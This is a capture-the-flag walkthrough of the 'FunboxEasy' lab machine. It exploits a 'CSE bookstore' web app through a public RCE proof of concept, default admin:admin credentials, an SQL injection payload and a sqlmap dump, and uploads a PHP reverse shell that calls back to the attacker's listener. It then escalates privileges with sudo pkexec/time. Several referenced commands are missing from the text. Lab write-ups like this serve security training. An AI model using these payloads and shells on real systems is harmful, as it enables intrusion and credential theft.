FunboxEasy
Checking out port 80 we have the default install page for Apache 2.
Checking the source on this page reveals no interesting information. From here I executed dirsearch.py against the target machine.
Checking the directory /store we are presented a web page for ‘CSE bookstore’.
Researching exploits on Google for ‘CSE bookstore’ we are presented with an exploit for Unauthenticated RCE. The exploit PoC has been linked below.
After downloading the PoC I executed it with the following command:
When prompted to launch a shell hit ‘y’.
This shell stops us from properly navigating the target machine and will return us back to the current working directory when the command has finished executing. As such I checked what binary’s are installed on the target machine so we can spawn a shell where we can navigate the target properly.
As per above perl
is installed on the system. From here I started a netcat
listener on my attacking machine.
I then executed the following command to gain a perl
reverse shell.
Moving into the home directory and then into the user tony’s home directory we have passwords.txt. Reading the contents of this text file shows the following information:
I then able to login with the SSH
password for the user tony.
Checking sudo -l
for sudo
permissions we come into a multitude of entries.
As we can execute sudo
as the user root without supplying a password here We can use pkexec or time
to spawn a bash shell as root.
root@funbox3:/var/www# id
uid=0(root) gid=0(root) groups=0(root)
Alternative way
Login Bruteforce
We can simply try one of the well-known default credential pairs admin:admin
against http://192.168.120.224/store/admin.php. And we will find that we are logged in as the administrator user of this web store.
SQL Injection Vulnerability
Alternatively, we can exploit an SQL injection vulnerability in the unauthenticated portion of this application. Clicking on a book image we are directed to its page with the bookisbn
GET parameter, like this:
http://192.168.178.111/store/book.php?bookisbn=978-1-49192-706-9
We can try a simple payload to test for SQLi vulnerabilities ' or 1=1; --
, like so:
http://192.168.178.111/store/book.php?bookisbn=%27%20or%201=1;%20--
And we see that this application indeed seems to be vulnerable based on the following verbose error:
Can't retrieve data You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '--'' at line 1
SQLMap
Since the website directory for the store is aptly names store
, we can venture an educated guess that the underlying database might also be named store
. Using sqlmap
, we can automate the exploitation and leak database contents:
kali@kali:~$ sqlmap -u http://192.168.178.111/store/book.php?bookisbn= --dump-all --batch -D store
___
__H__
___ ___[,]_____ ___ ___ {1.4.10#stable}
|_ -| . [.] | .'| . |
|___|_ [']_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
...
Database: store
Table: admin
[1 entry]
+-------+--------------------------------------------------+
| name | pass |
+-------+--------------------------------------------------+
| admin | d033e22ae348aeb5660fc2140aec35850c4da997 (admin) |
+-------+--------------------------------------------------+
...
kali@kali:~$
And we have obtained the user credentials admin:admin
via this vulnerability.
File Upload Vulnerability
Having logged in with the recovered or guessed credentials admin:admin
at http://192.168.120.224/store/admin.php, we are redirected to http://192.168.120.224/store/admin_book.php. This page shows a listing of existing books.
In addition, we see a link to Add new book
in the top-left portion of the screen that leads us to http://192.168.120.224/store/admin_add.php. Here, it looks like we are able to upload a new file to the store.
We can try uploading a PHP reverse shell from PentestMonkey:
kali@kali:~$ cp /usr/share/webshells/php/php-reverse-shell.php rev.php
We will be sure to change IP address and port as needed:
kali@kali:~$ cat rev.php
<?php
// php-reverse-shell - A Reverse Shell implementation in PHP
// Copyright (C) 2007 pentestmonkey@pentestmonkey.net
...
$ip = '192.168.118.3'; // CHANGE THIS
$port = 4444; // CHANGE THIS
...
kali@kali:~$
There is one caveat in the upload process: the Publisher
text field cannot be arbitrary and must be one of several choices. We can easily view these choices on the page http://192.168.120.224/store/publisher_list.php:
kali@kali:~$ curl http://192.168.120.224/store/publisher_list.php
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
...
<div class="container" id="main"> <p class="lead">List of Publisher</p>
<ul>
<li>
<span class="badge">2</span>
<a href="bookPerPub.php?pubid=1">Wrox</a>
</li>
<li>
<span class="badge">2</span>
<a href="bookPerPub.php?pubid=2">Wiley</a>
</li>
<li>
<span class="badge">3</span>
<a href="bookPerPub.php?pubid=3">O'Reilly Media</a>
</li>
<li>
<span class="badge">3</span>
<a href="bookPerPub.php?pubid=4">Apress</a>
</li>
<li>
<span class="badge">0</span>
<a href="bookPerPub.php?pubid=5">Packt Publishing</a>
</li>
<li>
<span class="badge">1</span>
<a href="bookPerPub.php?pubid=6">Addison-Wesley</a>
</li>
<li>
<a href="books.php">List full of books</a>
</li>
</ul>
...
We see Apress
as one of the choices listed, and we will use this publisher label. The rest of the fields can contain arbitrary data, like so:
If we now return to http://192.168.120.224/store/admin_book.php, we will see our new entry added to the top of the list:
ISBN Title Author Image Description Price Publisher
shell shell hacker php-reverse-shell.php shell 10.00 Apress Edit Delete
Next, we will set up a listener on port 4444 and then trigger the reverse shell by navigating to http://192.168.53.111/store/bootstrap/img/rev.php
kali@kali:~$ nc -lvp 4444
listening on [any] 4444 ...
192.168.120.224: inverse host lookup failed: Unknown host
connect to [192.168.118.3] from (UNKNOWN) [192.168.120.224] 38114
Linux funbox3 5.4.0-42-generic #46-Ubuntu SMP Fri Jul 10 00:24:02 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
17:16:51 up 1:03, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$
And we have a reverse shell as user www-data
.
.